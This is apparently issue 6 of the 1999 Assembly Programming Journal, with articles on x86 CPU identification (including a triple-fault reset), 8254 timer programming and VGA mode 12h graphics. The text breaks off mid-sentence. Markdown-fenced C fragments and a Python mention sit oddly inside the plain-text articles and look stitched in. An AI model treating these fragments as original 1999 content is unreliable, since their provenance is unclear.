::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                               Oct/Nov   99
:::\_____\::::::::::.                                              Issue      6
::::::::::::::::::::::.........................................................

            A S S E M B L Y      P R O G R A M M I N G      J O U R N A L
                      http://asmjournal.freeservers.com
                           asmjournal@mailcity.com


T A B L E    O F    C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Processor Identification"........................Chris.Dragan.&.Chili

"Timing with the 8254 PIT"...............................Jan.Verhoeven

"Programming the Universal Graphics Mode"................Jan.Verhoeven

"Conway's Game of Life".................................Laura.Fairhead

"'Ambulance Car' Disassembly"....................................Chili

"'Ambulance Car' Disinfector"....................................Chili

"Assembling for PIC's"...................................Jan.Verhoeven

"Splitting Strings"............................................mammon_

"String to Numeric Conversion"..........................Laura.Fairhead

Column: Win32 Assembly Programming
    "WndProc, The Dirty Way".................................X-Calibre
    "Programming the DOS Stub"...............................X-Calibre

Column: The Unix World
    "Using ioctl()"............................................mammon_

Column: Assembly Language Snippets
    "BinToString"....................................Cecchinel Stephan

Column: Issue Solution
    "Absolute Value"....................................Laura.Fairhead

----------------------------------------------------------------------
       ++++++++++++++++++Issue    Challenge+++++++++++++++++
        Find the Absolute Value of a Register in    4 Bytes
----------------------------------------------------------------------


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                     by mammon_


Customarily I'll start with the bad news: this issue is about a week late,
primarily because I had forgotten about the two Win32 articles X-Calibre
passed on to me a month or two ago. The good news, however, is that there
may be a December issue; currently I have about 5 or so extra articles that
threatened to bump this issue over the 200K mark. Eventually I may have a
chance to be late on a monthly basis...

This issue has a bit of a 'back to the basics' feel about it. Packed inside
are articles dealing with some of the 'classics' of assembly: CPU identific-
ation, graphics, and the ever-popular Game of Life. The disassembly of the
Ambulance Car virus also has an old-school feeling to it, hearkening back to
the old days of DOS and com files.

Additional highlights include X-Calibre's 'bending windows to your will' Win32
articles, two excellent chip programming articles from Jan, utility routines
from Laura and myself, and of course my usual attempt to defend assembly as a
viable programming language for the Unix environment.

Enough commentary; time to get this mag on the road!


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       Processor Identification
                                                       by Chris Dragan & Chili


Being able to identify the processor on which your program is running can be a
very useful feature, if not to ensure that your program will work on a wider
range of computers, then at least to provide minimum compatibility and to
guarantee that it does not crash on some processors.

The first part of this article explains how to distinguish between 80486 and
older processors by checking for known behaviours, while the second part
(written by Chris) takes it one step further, explaining how to use the CPUID
instruction on newer processors, how to check the ID register by means of a
triple-fault reset (TFR) and how to correctly identify a Cyrix processor.


EFLAGS Register
---------------
On old pre-286 CPUs, bits 12 through 15 of the FLAGS register are always set,
so we can check for this type of processor, as opposed to newer ones, by
attempting to clear those bits:

                pushf
                pop        ax
                and        ax, 0fffh        ; clear bits 12-15
                push    ax
                popf
                pushf
                pop        ax
                and        ax, 0f000h
                cmp        ax, 0f000h        ; check if bits 12-15 are set
                je        _is_an_older_cpu
                jne        _is_a_286_or_higher

Once we know that we are at least on a 286 processor, we can then check to see
if we're on a 32-bit processor (386 or higher) or on an actual 286. For this
purpose we know that bits 12-15 of the FLAGS register are always clear on a 286
processor in real mode:

                pushf
                pop        ax
                or        ax, 0f000h        ; set bits 12-15
                push    ax
                popf
                pushf
                pop        ax
                and        ax, 0f000h        ; check if bits 12-15 are clear
                jz        _is_a_286
                jnz        _is_a_386_or_higher

If, instead, the processor is running in protected mode, these bits are used
for the IOPL (bits 12-13) and NT (bit 14) flags. Note that on 32-bit processors
in real mode bits 12-14 hold the last value loaded into them. Also remember
that there is no virtual-8086 mode on 16-bit processors.

In order to find out if the processor is in real or protected mode we must test
the Protection Enable flag (bit 0 of CR0); if it is set, then we're in
protected mode:

                smsw    ax
                and        ax, 0001h        ; check if bit 0 (PE) is clear
                jz        _real_mode
                jnz        _protected_mode

To find out if it is a 486 or a newer processor we'll try to toggle the AC
flag (bit 18), since it is always clear on a 386 processor (also on the NexGen
Nx586), unlike newer ones that allow it to be toggled:

                pushfd
                pop        eax
                mov        ebx,eax
                xor        eax,40000h        ; toggle bit 18
                push    eax
                popfd
                pushfd
                pop        eax
                xor        eax,ebx            ; check if bit 18 changed
                jz        _is_a_386
                jnz        _is_a_486_or_higher

And finally, to check if we're on an old 486 or on a new 486 or later processor
(e.g. Pentium), we'll try to toggle the ID flag (bit 21), which indicates the
presence of a processor that supports the CPUID instruction. This part is
explained below in the section about CPUID.


PUSH SP Instruction
-------------------
Before the 286, processors implemented the "PUSH SP" instruction in a different
way, updating the stack pointer before the value of SP is pushed onto the
stack, unlike newer processors which push the value of the SP register as it
existed before the instruction was executed (both in real and virtual-8086
modes).

  Older CPUs              286+
  {                       {
   SP = SP - 2             TEMP = SP
   SS:SP = SP              SP = SP - 2
  }                        SS:SP = TEMP
                          }

  (credit for the PUSH SP algorithm representation goes to Robert Collins)

So all one has to do is push SP, pop the value back and see whether it differs
from the current value of SP:

                push    sp
                pop        ax
                cmp        ax, sp            ; check if SP values differ
                je        _is_a_286_or_higher
                jne        _is_an_older_cpu

Note - If you want the same result on all processors (the pushed value being
       SP after the decrement, as on the older CPUs), use the following code
       instead of a PUSH SP instruction:

                push    bp
                mov        bp, sp
                xchg    bp, [bp]


Shift and Rotate Instructions
-----------------------------
Starting with the 186/188, all processors mask shift/rotate counts modulo 32,
restricting the maximum count to 31 (in all operating modes, including
virtual-8086 mode). Earlier CPUs do not mask the shift/rotation count, using
all 8 bits of CL. So, if we try to shift by 32, on newer processors the value
is left unchanged (since the shift count is masked to 0), whereas on an older
processor the result will be zero:

                mov        ax, 0ffffh
                mov        cl, 32
                shl        ax, cl
                test       ax, ax            ; a count of 0 leaves the flags
                                             ; untouched, so test the result
                jz         _is_an_older_cpu
                jnz        _is_a_18x_or_higher
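
The effect of the count masking can also be modelled away from the processor.
The following C fragment is only an illustrative sketch: shl16 and its
masks_count parameter are made-up names, and the function merely imitates a
16-bit "SHL AX, CL" with and without the modulo 32 masking described above.

```c
#include <stdint.h>

/* Model of "SHL AX, CL" on a 16-bit register.
 * masks_count != 0 : 186 and later, only the low 5 bits of CL are used
 * masks_count == 0 : 8086/8088, all 8 bits of CL are used
 * (shl16 and masks_count are hypothetical names for this sketch) */
uint16_t shl16(uint16_t value, uint8_t count, int masks_count)
{
    if (masks_count)
        count &= 31;            /* 32 becomes 0, 33 becomes 1, ... */
    if (count >= 16)
        return 0;               /* every bit has been shifted out */
    return (uint16_t)((uint32_t)value << count);
}
```

With a count of 32, shl16(0xFFFF, 32, 1) hands back the value unchanged, while
shl16(0xFFFF, 32, 0) gives zero, which is exactly the difference the detection
code relies on.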


MUL Instruction
---------------
NEC processors differ from Intel's with respect to the handling of the zero
flag (ZF) during a MUL operation. A NEC V20/V30 does not clear ZF after a
multiplication with a non-zero result, leaving it as it was, whereas an Intel
8086/88 will always clear it (note that this is only true for the specified
processors):

                xor        al, al            ; force ZF to set
                mov        al, 40h
                mul        al                ; check if ZF is clear
                jz        _is_a_NEC_V20_V30
                jnz        _is_an_Intel_808x

In addition to the list of sites where you can find more information,  provided
by Chris at the end of this article, you can also try this one:

        http://grafi.ii.pw.edu.pl/gbm/x86/       (Grzegorz Mazur)

And also the following packages/programs (available somewhere on the net):

        The Undocumented PC                       (Frank van Gilluwe)
        HelpPC                                   (David Jurgens)
        80x86.CPU file                           (Christian Ludloff)


ID Register
-----------
Beginning with the 80386 processor, Intel included a so-called ID register,
which contains information about the processor model and stepping. This
register is accessible in an unusual way - it is passed in DX after reset.

To read the ID register one must perform the following steps:

 1. By storing value 0Ah (resume with jump) at address 0Fh (reset code) in the
    CMOS data area, inform the BIOS not to run POST after reset, but to return
    control to the program.
 2. Update the after-reset far jump address at 0040h:0067h.
 3. Set the shutdown status word (0040h:0072h) to 0, to avoid undesirable
    side-effects.
 4. Cause a reset.

Causing a reset is typically done by issuing a so-called triple-fault reset,
i.e. causing an error from which the processor cannot recover, so that it
enters a reset state. A TFR (triple-fault reset) can be done only if we have
enough control over the processor, i.e. under plain DOS in real mode (no EMS)
or under Win'95 (this is risky). The following code shows how to do it in DOS.
The code is assumed to be in a COM program.

;------------------------------------------------------------------------------

section .data

GDT             dd 0, 0                   ; Selector 0 is empty
                dd 0000FFFFh, 00009A00h   ; Selector 8 - code segment
GDTR            dw 000Fh, 0, 0            ; Limit 0Fh - two selectors
IDTR            dw 0, 0, 0                ; Empty IDT will cause TFR
SaveSP          dw 0                      ; Stack pointer kept across the reset

section .text

        ; Ensure that we are in real mode, not in V86
                smsw    ax
                and        al, 1
                jnz        near _skip_tfr_since_in_v86_mode

        ; Update code descriptor as we are going to enter pmode
                xor        eax, eax
                mov        ax, cs
                shl        eax, 4
                or        [GDT+10], eax
                add        eax, GDT
                mov        [GDTR+2], eax

        ; Update reset code in CMOS data area
                cli                                ; Disable interrupts
                mov        [SaveSP], sp            ; Save stack pointer
                mov        al, 0Fh                    ; Address 0Fh in CMOS area
                out        70h, al
times 3            jmp        short $+2                ; Short delay
                mov        al, 0Ah                    ; Value 0Ah - far jump
                out        71h, al

        ; Update resume address
                push    word 0
                pop        es
                mov        [es:0467h], word _tfr    ; offset
                mov        [es:0469h], cs            ; segment
                mov        [es:0472h], word 0        ; Update shutdown status

        ; Switch to pmode
                lgdt    [GDTR]                    ; Load GDT
                lidt    [IDTR]                    ; Load empty IDT
                smsw    ax
                or        al, 01h                    ; Set pmode bit
                lmsw    ax
                jmp        0008h:_reset            ; Reload CS
_reset:            mov        ax, [cs:0FFFFh]            ; Reach beyond segment limit

        ; After reset we are here with DX containing the ID register
_tfr:            cli
                mov        ax, cs
                mov        ds, ax
                mov        es, ax
                mov        ss, ax
                mov        sp, [SaveSP]
                sti

;------------------------------------------------------------------------------

Of course there are also other ways of reading the ID register. They are well
described in DDJ (www.x86.org).

As said before, the ID register contains information about the processor model
and stepping. The format of the register is as follows:

        bits 15..12        - stepping
        bits 11..8        - model
        bits 7..0        - revision

Some example ID register values:

        0303    i386DX
        2303    i386SX
        3301    i376

This format of the ID register was used in Intel 386 processors (all except
RapidCAD), AMD 386 processors and most IBM 486 processors.

Another format of the ID register was introduced with Intel 486 processors.
This format is similar to the format of the CPUID model information (see
below), and it was kept the same up to the Pentium. However, newer processors
do not keep any useful information in the ID register (it is usually 0). This
also applies to Cyrix 486 processors.

        bits 15..14        - unused, zero
        bits 13..12        - typically indicate overdrive
        bits 11..8        - model
        bits 7..4        - stepping
        bits 3..0        - revision

And some example ID register values with this format for Intel processors:

        0401    i486DX-25/33
        0421    i486SX
        0451    i486SX2
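
Pulling the fields out of the value found in DX is a matter of shifts and
masks. As a minimal sketch in C (the struct and function names are invented
here, and the field names simply follow the 486-style table above):

```c
#include <stdint.h>

/* Fields of the 486-style ID register (value of DX after reset),
 * named as in the table above. The struct and function names are
 * made up for this sketch. */
struct id486 {
    unsigned type;      /* bits 13..12, typically overdrive indication */
    unsigned model;     /* bits 11..8 */
    unsigned stepping;  /* bits 7..4  */
    unsigned revision;  /* bits 3..0  */
};

struct id486 decode_id486(uint16_t dx)
{
    struct id486 id;
    id.type     = (dx >> 12) & 0x3;
    id.model    = (dx >> 8)  & 0xF;
    id.stepping = (dx >> 4)  & 0xF;
    id.revision =  dx        & 0xF;
    return id;
}
```

For the i486SX value 0421 from the list above this yields model 4, stepping 2
and revision 1.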


Cyrix DIR
---------
All Cyrix processors have Device Identification Registers (DIRs), which are
used to identify these processors. To read the DIRs, one first has to determine
that the processor is a Cyrix. This can be accomplished in two ways:

 1. On modern processors, using the CPUID instruction.
 2. On early Cyrix processors, using the 5/2 method.

If there is no CPUID instruction, one has to use the second method. If one
knows that the processor is a 486, the following code can be used:

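                mov        ax, 0005h        ; AH = 0, AL = 5
                mov        cl, 2
                sahf                        ; clear the low flags (AH = 0)
                div        cl               ; 5 / 2
                lahf                        ; read the flags back
                cmp        ah, 2            ; still only bit 1 set?
                je         _we_are_on_cyrix
                jne        _this_is_not_cyrix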

Once we have determined we are on a Cyrix processor, we can read its DIRs to
get its model and stepping information. All Cyrix processors have their special
registers accessible through ports 22h and 23h. Port 22h takes the register
number and port 23h gives access to the register value.

        ; This function reads a Cyrix control register
        ; It expects a register address in AL and returns value also in AL
ReadCCR:        out        22h, al            ; select register
times 3            jmp        short $+2        ; delay
                in        al, 23h            ; get register contents
                ret

DIRs have offsets 0FEh (DIR0) and 0FFh (DIR1). DIR0 contains model/stepping,
while DIR1 contains revision. The following code reads them:

                mov        al, 0FEh
                call       ReadCCR
                mov        [DIR0], al
                mov        al, 0FFh
                call       ReadCCR
                mov        [DIR1], al

Example DIR0 values:

        1B        Cx486DX2
        31        6x86(L) clock x2
        55        6x86MX clock x4


CPUID Instruction
-----------------
All newer processors have the CPUID instruction, which helps to identify the
processor we are running on. Before using it, we must first determine if it is
supported, by flipping the ID flag (bit 21 of EFLAGS).

                pushfd
                pop        eax
                mov        ecx, eax          ; keep the original EFLAGS
                xor        eax, 00200000h    ; flip bit 21
                push       eax
                popfd
                pushfd
                pop        eax
                xor        eax, ecx          ; non-zero if bit 21 was flipped
                jnz        _cpuid_supported
                jz         _no_cpuid

The only problem may be that NexGen processors do not support the ID flag, but
they do support the CPUID instruction. To determine that, we must hook the
Invalid Opcode exception (int 6) and execute the instruction. If the exception
is triggered, CPUID is not supported.

Also some early Cyrix processors (namely 5x86 and 6x86) have the CPUID
instruction disabled. To enable it, we must first enable the extended CCRs
and then enable the instruction by setting bit 7 in CCR4.

        ; Enable extended CCRs
                mov        al, 0C3h        ; C3 corresponds to CCR3
                call    ReadCCR
                and        ah, 0Fh            ; bits 7..4 of CCR3 <- 0001b
                or        ah, 10h
                call    WriteCCR

        ; Enable CPUID
                mov        al, 0E8h        ; E8 corresponds to CCR4
                call    ReadCCR
                or        ah, 80h            ; bit 7 enables CPUID
                call    WriteCCR

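The following functions are used to read/write CCRs. Unlike the ReadCCR shown
earlier, this version returns the value in AH and leaves the register number
in AL, ready for WriteCCR: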

ReadCCR:        out        22h, al            ; Select control register
times 3            jmp        short $+2
                xchg    al, ah
                in        al, 23h            ; Read the register
                xchg    al, ah
                ret

WriteCCR:        out        22h, al            ; Select control register
times 3            jmp        short $+2
                mov        al, ah
                out        23h, al            ; Write the register
                ret

After enabling CPUID we must test if it is supported by flipping the ID flag,
unless of course we have determined that we are not on a 5x86 or 6x86 by
reading DIRs.

Once we have determined that CPUID is supported, we can use it to identify the
processor. The instruction expects EAX to hold a function number (level) and
returns information corresponding to this number in EAX, EBX, ECX and EDX. The
two most important levels are listed below.

        level 0 (eax=0) returns:

        eax                Maximum available level
        ebx:edx:ecx        Vendor ID in ASCII characters
                        Intel    - "GenuineIntel" (ebx='Genu', bl='G'(47h))
                        AMD        - "AuthenticAMD"
                        Cyrix    - "CyrixInstead"
                        Rise    - "RiseRiseRise"
                        Centaur - "CentaurHauls"
                        NexGen    - "NexGenDriven"
                        UMC        - "UMC UMC UMC "

        level 1 (eax=1) returns:

        eax                bits 13..12        0 - normal
                                        1 - overdrive
                                        2 - secondary in dual system
                        bits 11..8        model
                        bits 7..4        stepping
                        bits 3..0        revision
                        If Processor Serial Number is enabled, all 32
                        bits are treated as the high bits (95..64) of
                        the number.
        edx                Processor features (e.g. bit 23 indicates MMX)
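
Once the register values have been stored by the assembly code, taking them
apart is straightforward. The C fragment below is a sketch under that
assumption: it does not execute CPUID itself, all function names are invented
for the illustration, and the field names follow the level 1 table above.

```c
#include <stdint.h>

/* Store the four ASCII characters held in a 32-bit register,
 * lowest byte first (BL holds the first character of EBX). */
static void put4(char *dst, uint32_t reg)
{
    int i;
    for (i = 0; i < 4; i++)
        dst[i] = (char)((reg >> (8 * i)) & 0xFF);
}

/* Build the 12-character vendor ID from the level 0 results.
 * The order is EBX, EDX, ECX; out must hold at least 13 bytes. */
void cpuid_vendor(uint32_t ebx, uint32_t edx, uint32_t ecx, char out[13])
{
    put4(out, ebx);
    put4(out + 4, edx);
    put4(out + 8, ecx);
    out[12] = '\0';
}

/* Field extraction for the level 1 results, following the table above. */
unsigned cpuid_model(uint32_t eax)    { return (eax >> 8) & 0xF; }
unsigned cpuid_stepping(uint32_t eax) { return (eax >> 4) & 0xF; }
unsigned cpuid_revision(uint32_t eax) { return eax & 0xF; }
int      cpuid_has_mmx(uint32_t edx)  { return (int)((edx >> 23) & 1); }
```

Feeding cpuid_vendor with ebx=756E6547h, edx=49656E69h and ecx=6C65746Eh
produces the string "GenuineIntel".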

There are also other levels, e.g. level 2 returns cache and TLB descriptors,
and level 3 the rest of the Processor Serial Number.

Other processors (AMD, Cyrix) also support extended levels. The first extended
level is 80000000h and it returns the maximum extended level in EAX. These
extended levels return information specific to those processors, e.g. 3DNow!
support or the processor name.

This example code determines MMX support:

        ; First check maximum available level
                xor        eax, eax        ; eax = 0 (level 0)
                cpuid
                cmp        eax, 0
                jng        _no_higher_levels

        ; Now check MMX support
                mov        eax, 1            ; level 1
                cpuid
                test    edx, 00800000h    ; bit 23 is set if MMX is supported
                jnz        _mmx_supported
                jz        _no_mmx

As this is not the place for listing all the available information about what
values are returned by CPUID, the ID register or DIRs, you should get the most
recent information from the processor vendors:

        www.intel.com
        www.amd.com
        www.cyrix.com

Also you can find very valuable information about the identification topic on:

        www.sandpile.org
        www.x86.org
        www.cs.cmu.edu/~ralf/files.html


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       Timing with the 8254 PIT
                                                       by Jan Verhoeven


Some time ago I saw a note on the mailing list from someone in need of a
flexible timer function. For this, there are several approaches.

First, there is the timertick which is updated every 55 ms. For long
time delays, this is the best method. Just read the timervalue at
0000:046C, add the desired delay (in 55 ms intervals) and wait until the
timer reaches that value.

A second approach is to use modern BIOSes which have a timing function
in BIOS interrupt 15h, but this is "only" present on machines from 1990
or later.

A third approach is to reprogram the RTC chip. No big deal, and there's
a very accurate timer in it (up to 8 kHz) which even has interrupt
capabilities for automated functions and simple multitasking.

But by far the best way (and most universal and accurate) is to use the
"spare" timer in your PC's 8254 chip.

This chip can be put in many operating modes, but we want it to do the
following:

        - start counting at a certain value
        - count down
        - latched reading mode
        - no influence on further PC operation

The counting sequence for the PC is as follows:

        - there are 2^16 BIOS-timervalue updates per hour
        - there are 2^16 8254 clockpulses per timertick

So, there are 2^32 clockpulses per hour. This boils down to one clock
pulse being around 838 ns. Not bad.
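
The arithmetic is easy to check. The small C fragment below is just a worked
example using the round figures from the list above; the constant and
function names are invented for the purpose.

```c
/* Timing figures derived from the two counts above.
 * The constant and function names are made up for this sketch. */
#define TICKS_PER_HOUR   65536.0   /* 2^16 BIOS timer ticks per hour  */
#define PULSES_PER_TICK  65536.0   /* 2^16 8254 clock pulses per tick */

/* Length of one BIOS timer tick in milliseconds: 3600 s / 2^16 */
double tick_ms(void)
{
    return 3600.0 * 1000.0 / TICKS_PER_HOUR;
}

/* Length of one 8254 clock pulse in nanoseconds: 3600 s / 2^32 */
double pulse_ns(void)
{
    return 3600.0 * 1e9 / (TICKS_PER_HOUR * PULSES_PER_TICK);
}
```

tick_ms() comes out just under 55 ms and pulse_ns() at roughly 838 ns, which
matches the numbers quoted in the text.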

In order to make things very clear I use Modula-2 to show how the
routines are coded. Modula is an extremely structured language, so I use
it as a kind of Meta-Assembler or Pseudo-Assembler.
For those not too familiar with Modula: a CARDINAL is not an old man in
a dress, but a 16 bit unsigned integer.

Here comes.....

---------- OpenTimer ---------------------------- Start ----------

PROCEDURE OpenTimer;        (*    open timer chip in mode 2    *)

BEGIN
    ASM
        MOV     AL, 34H
        OUT     43H, AL
        XOR     AL, AL
        OUT     40H, AL
        OUT     40H, AL
    END;
END OpenTimer;

---------- OpenTimer ----------------------------- End -----------

The value 34h is constructed as follows:

        bit        function
       -----    ---------------------------
       6 - 7    select counter (0 - 3)
       4 - 5    Read/write mode
       1 - 3    Select countermode
         0        Binary or BCD

For this case we selected:

        - counter 00
        - read/write two bytes from/to counterchip
        - Mode 2
        - binary values
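
To see how such a control byte is put together from the bit table, here is a
minimal sketch in C. pit_control_word is a made-up helper, not part of any
library; it only packs the four fields into one byte.

```c
#include <stdint.h>

/* Compose an 8254 control word from the fields in the table above.
 * counter : 0..3  -> bits 7..6
 * rw      : 0..3  -> bits 5..4 (3 = two bytes, low byte first)
 * mode    : 0..7  -> bits 3..1
 * bcd     : 0..1  -> bit 0     (0 = binary)
 * pit_control_word is a made-up name for this sketch. */
uint8_t pit_control_word(unsigned counter, unsigned rw,
                         unsigned mode, unsigned bcd)
{
    return (uint8_t)(((counter & 3u) << 6) |
                     ((rw      & 3u) << 4) |
                     ((mode    & 7u) << 1) |
                      (bcd     & 1u));
}
```

pit_control_word(0, 3, 2, 0) gives 34h, the value used in OpenTimer, and the
same call with mode 3 gives 36h.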

These few lines open the timer in "Mode 2" and prime the down counting
register to 0000. I would love to elaborate on the code, but this is all
which is needed....

It is kind of handy if you restore the state of your machine after your
application stops using the CPU. Therefore there is the following
function to restore "normal" operation of this channel.

---------- CloseTimer --------------------------- Start ----------

PROCEDURE CloseTimer;            (*    close timer chip    *)

BEGIN
    ASM
        MOV     AL, 36H
        OUT     43H, AL
        XOR     AL, AL
        OUT     40H, AL
        OUT     40H, AL
    END;
END CloseTimer;

---------- CloseTimer ---------------------------- End -----------

This function just restores the timer to its default mode and clears
the counting registers. The value "36h" means:

        - counter 00
        - read/write two bytes from/to counterchip
        - Mode 3
        - binary values

---------- ReadTimer ---------------------------- Start ----------

PROCEDURE ReadTimer () : CARDINAL;       (*  read timer    *)

VAR        Time        : CARDINAL;

BEGIN
    ASM
        MOV     AL, 6
        OUT     43H, AL
        IN     AL, 40H
        MOV     AH, AL
        IN     AL, 40H
        XCHG AH, AL
        MOV     [Time], AX
    END;
    RETURN Time;
END ReadTimer;

---------- ReadTimer ----------------------------- End -----------

After we opened the timer, it might be a good idea to also use it. This
is done in four steps:

 - current value of counting register is stored in On-Chip buffer
 - the low byte is read in first
 - the high byte is read in second
 - low and high byte are put in right order

Make sure you always read in TWO bytes, else you will run into framing
errors. Also keep in mind that this is a DOWN-COUNTER!
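
Because the counter runs downwards, the time that passed between two readings
is the earlier value minus the later one. A minimal sketch in C, with invented
function names, of joining the two bytes and taking that difference:

```c
#include <stdint.h>

/* Combine the two bytes read from port 40h; the low byte arrives first. */
uint16_t pit_combine(uint8_t low, uint8_t high)
{
    return (uint16_t)(((unsigned)high << 8) | low);
}

/* Pulses elapsed between two readings of the down-counter.
 * The earlier reading is normally the larger one; the cast to 16 bits
 * makes the subtraction wrap correctly when the counter passed 0000
 * once in between. */
uint16_t pit_elapsed(uint16_t earlier, uint16_t later)
{
    return (uint16_t)(earlier - later);
}
```

The wrap-around only covers a single pass through zero, so intervals longer
than one timer tick cannot be measured this way.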

The value "6" which is sent to the 8254 first might be wrong, but in all
my software it just works fine. It selects Channel 0 to be latched. The
lower four bits of this word should be "don't care" bits, but I prefer
"not to fix a running program".

---------- MilliSeconds ------------------------- Start ----------

PROCEDURE MilliSeconds (ms : CARDINAL);

VAR        MaxCount        : CARDINAL;

BEGIN
    MaxCount := 65535 - ms * 1193;
    OpenTimer;
    WHILE ReadTimer () > MaxCount DO
        (*        Nothing!     *)
    END;
    CloseTimer;
END MilliSeconds;

---------- MilliSeconds -------------------------- End -----------

This function has some deliberate errors inside. I calculate MaxCount
such that it is too big. Reason: in Modula I do not control math
operations as well as in ASM (of course!) That's why I subtract the
value from 65,535 instead of 65,536. In ASM I would have used a NOT
operation, but for Modula this is good enough.

Furthermore I use the number 1193 to go from counting pulses to
milliseconds. It's a not too big number so it is good enough to use in
integer arithmetic.
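
One consequence of working with a 16 bit CARDINAL is that ms * 1193 has to fit
in 16 bits, which limits a single delay to 54 ms. The C sketch below repeats
the MaxCount calculation with that check added; the check and all names are
assumptions of this illustration, not part of the Modula routine.

```c
#include <stdint.h>

#define PULSES_PER_MS 1193u   /* rounded, as in MilliSeconds */
#define MAX_DELAY_MS  54u     /* 55 * 1193 would exceed 65535 */

/* Stop value for the down-counter, computed as in MilliSeconds.
 * Returns 0 and leaves *stop untouched when ms does not fit in a
 * single 16-bit count. The names here are made up for this sketch. */
int pit_stop_value(unsigned ms, uint16_t *stop)
{
    if (ms > MAX_DELAY_MS)
        return 0;
    *stop = (uint16_t)(65535u - ms * PULSES_PER_MS);
    return 1;
}
```

For a delay of 10 ms the stop value is 65535 - 11930 = 53605.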

This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a
stop-value for the counter, initialises the counter to mode 2 and value
0000 and then waits until the timer reaches there. Next it closes the
timer and it's all over.

The next function, which was made for diagnostic purposes, shows that in
an application you would have to correct for the time it takes to read the
timer itself.

---------- TestTimer ---------------------------- Start ----------

PROCEDURE TestTimer;

VAR        First, Last, Delta, k         : CARDINAL;

BEGIN
    OpenTimer;
    First := ReadTimer ();
    WriteCard (First, 6);        Write (Tab);
    FOR k := 1 TO 10000 DO
        (*        Nothing!     *)
    END;
    Last := ReadTimer ();
    Delta := First - Last;
    WriteCard (Delta, 6);        WriteLn;
    CloseTimer;
END TestTimer;

---------- TestTimer ----------------------------- End -----------

You could use this routine to calibrate a timing loop, but on modern PC
architectures this could well lead to disasters. Modern CPUs are so
damned fast, that your loop counter will overflow.
Therefore this calibration technique is only useful for modifying
inherently slow routines, like those using I/O operations. For some
reason, I/O operations still need around one microsecond each, so these
will slow down the routine enough to make sure there will be no overflow
in the loop-counters.

A friend of mine just uses IN instructions from some silly address to
get reasonably accurate timing loops, assuming that 1 IN operation is
about 1 microsecond. But it could well lead to trouble on modern PCI
hardware.

All in all, for most delay-routines, the dumb waiting function is by far
the best since it is the most reliable and accurate to less than a
microsecond. But if you need this many digits, use compensated software,
that takes into account the time to read the timers twice -- because you
need to keep in mind that also this routine relies heavily on I/O
instructions, so it is not infinitely fast!


In a future article I will describe how to use the RTC chip for
generating timing signals and how to use it via the Programmable
Interrupt Controller in automatic mode. That article will be pure ASM
again, so don't be worried about this detour into Modula.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                       Programming for the one and only universal graphics mode
                                                               by Jan Verhoeven


If you need to write a graphics routine that has a reasonable resolution and
which is nearly always present, there is just one choice: mode 12h or the well
known 640 x 480 x 16. This mode is the highest resolution mode which is always
available in all VGA cards.
800 x 600 is better but it either needs a VESA driver installed or the user
must himself figure out how to switch the machine to that mode. Not an easy
task for the majority of "experienced Windows users" (isn't this a paradox?).

Mode 12h is treated as a worst case by many Superior Operating Systems. But
for most purposes it is just fine. It's fast, reasonably easy to use and it is
omnipresent.

That's why I decided to port my textmode windows to this graphics mode.


The application.
----------------
I built a simple AD converter that measures voltages and converts them into
digits. The ADC fits on a COM port and is completely controlled from software.
The idea was to have different reference voltages, sample rates, scaling
factors, a bar graph display and a 4 digit LED-style read-out.
And in the bottom window there is a "recorder" that plots pixels in real-time.

Once all parts have been explained I might post the full package (the sources,
the schematics and such) so that everyone can build one of their own.


How to switch to Mode 12h?
--------------------------
Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows:

        mov        ax, 012
        int        010

and you're in. Remember, I use A86 syntax, so all numbers starting with a
nought are considered hexadecimal.


Plotting in a graphics screen.
------------------------------
Now that we're in Mode 012, we should also try to fill that clear black
rectangle. But first we should define a way of remembering WHERE to put our
cute little dots.

For all my plotting, I use the following structure:

    -------------------------------- Window Information Block ------
    Infoblk1 STRUC
    Win_X    dw       ?        ; top-left window position, X and ...
    Win_Y    dw       ?        ;      ... Y
    Win_wid  dw       ?        ; window width and ...
    Win_hgt  dw       ?        ;      ... height
    CurrX    dw       ?        ; within window, current X-coordinate, ...
    CurrY    dw       ?        ;      ... and Y
    DeltaX   dw       ?        ; length for horizontal lines
    DeltaY   dw       ?        ; length for vertical lines
    Indent   dw       ?        ; Indentation for characters in PIXELS!
    Multiply dw       ?        ; screenwidth handler
    Watte01  dw       ?        ; filler, reserved
    BoxCol   db       ?        ;      border colour
    TxtCol   db       ?        ;        text colour
    BckCol   db       ?        ; background colour
    MenuCol  db       ?        ;  menu text colour
             ENDS
    -------------------------------- Window Information Block ------

It will be clear after looking into this list, that each InfoBlock describes a
window, a rectangular portion of the screen, which is treated as a unity.

Each window is defined by the topleft (x,y) coordinates and the window width
and height. Knowing these four words, the window is defined and fixed on
screen. If the window is to be moved, just adjust the topleft (x,y) position.

Since it is handy to know where in this window we are plotting, I defined two
more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made,
it will start on these coordinates.

For line drawing and such there are the "DeltaX" and "DeltaY" variables. The
former is for horizontal lines, the latter for vertical lines.

Now that we have our fancy window, where we can plot and draw lines, we also
need some text to see what it's all supposed to be about. The text is plotted
at the CurrX and CurrY positions. Each character is PLOTTED there, so tokens
can be put at ANY location on screen, not just on byte boundaries.

For nice and easy alignments, I defined the variable "Indent" which defines
how many pixels from the left or right margin must remain blank.

Since this software should be as easy to adapt to other resolutions as
possible, there is a need for a "Multiply" variable. This is filled with the
offset address of a dedicated screen multiplier routine.
In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to
calculate the pixel address you need to use the following formula:

        PixAddr = CurrY * 80 + CurrX / 8

So we need a set of damned fast Mul_80 routines. If needed you can make
several of them, find out the CPU and hardware at init-time, and fill the
offset of the most suitable routine into the Window definition structures.
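
As a quick check of the formula, here is a minimal sketch in Python. It is not
part of the original package: the name pix_addr is made up for this
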